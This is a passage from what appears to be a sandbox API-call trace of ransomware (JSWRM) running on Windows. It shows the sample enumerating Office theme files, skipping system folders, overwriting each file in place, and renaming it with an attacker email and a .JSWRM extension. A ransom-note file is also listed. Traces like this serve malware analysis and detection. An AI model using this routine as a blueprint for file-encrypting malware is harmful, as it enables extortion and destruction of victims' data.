hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0100.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0100.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0100.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0100.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.545] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green Yellow.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green yellow.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green Yellow.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green yellow.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0100.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0100.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.545] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1132ba98, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1132ba98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1132ba98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e3, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Green.xml", cAlternateFileName="")) returned 1 [0100.545] lstrcmpiW (lpString1="Green.xml", lpString2=".") returned 1 [0100.545] lstrcmpiW (lpString1="Green.xml", lpString2="..") returned 1 [0100.545] lstrcmpiW (lpString1="Green.xml", lpString2="...") returned 1 [0100.545] lstrcmpiW (lpString1="Green.xml", lpString2="windows") returned -1 [0100.545] lstrcmpiW (lpString1="Green.xml", lpString2="recovery") returned -1 [0100.546] lstrcmpiW (lpString1="Green.xml", lpString2="perflogs") returned -1 [0100.546] lstrcmpiW (lpString1="Green.xml", lpString2="documents and settings") returned 1 [0100.546] lstrcmpiW (lpString1="Green.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.546] lstrcmpiW (lpString1="Green.xml", lpString2="system volume information") returned -1 [0100.546] lstrcmpiW (lpString1="Green.xml", lpString2="msocache") returned -1 [0100.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0100.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green.xml", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green.xml", lpUsedDefaultChar=0x0) returned 9 [0100.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0100.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green.xml", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green.xml", lpUsedDefaultChar=0x0) returned 9 [0100.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0100.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.546] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=739) returned 1 [0100.546] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.547] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.548] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.548] CloseHandle (hObject=0x314) returned 1 [0100.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0100.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0100.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0100.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.549] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Green.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\green.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0100.550] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328851e3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x328851e3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x328851e3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0100.550] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0100.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0100.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0100.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.550] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Marquee.xml", cAlternateFileName="")) returned 1 [0100.550] lstrcmpiW (lpString1="Marquee.xml", lpString2=".") returned 1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="..") returned 1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="...") returned 1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="windows") returned -1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="recovery") returned -1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="perflogs") returned -1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="documents and settings") returned 1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="system volume information") returned -1 [0100.551] lstrcmpiW (lpString1="Marquee.xml", lpString2="msocache") returned -1 [0100.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marquee.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marquee.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Marquee.xml", lpUsedDefaultChar=0x0) returned 11 [0100.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0100.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marquee.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marquee.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Marquee.xml", lpUsedDefaultChar=0x0) returned 11 [0100.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0100.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0100.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0100.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Marquee.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\marquee.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.552] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=721) returned 1 [0100.552] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d0) returned 0x20b1f8 [0100.552] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2d0, lpOverlapped=0x0) returned 1 [0100.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.554] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2d0, lpOverlapped=0x0) returned 1 [0100.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.554] CloseHandle (hObject=0x314) returned 1 [0100.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0100.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0100.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0100.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0100.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.554] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Marquee.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\marquee.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Marquee.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\marquee.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0100.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0100.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0100.555] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1139e160, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Median.xml", cAlternateFileName="")) returned 1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2=".") returned 1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="..") returned 1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="...") returned 1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="windows") returned -1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="recovery") returned -1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="perflogs") returned -1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="documents and settings") returned 1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="system volume information") returned -1 [0100.555] lstrcmpiW (lpString1="Median.xml", lpString2="msocache") returned -1 [0100.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0100.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Median.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Median.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Median.xml", lpUsedDefaultChar=0x0) returned 10 [0100.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0100.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Median.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Median.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Median.xml", lpUsedDefaultChar=0x0) returned 10 [0100.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0100.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\median.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.556] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=740) returned 1 [0100.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.556] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.564] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.564] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 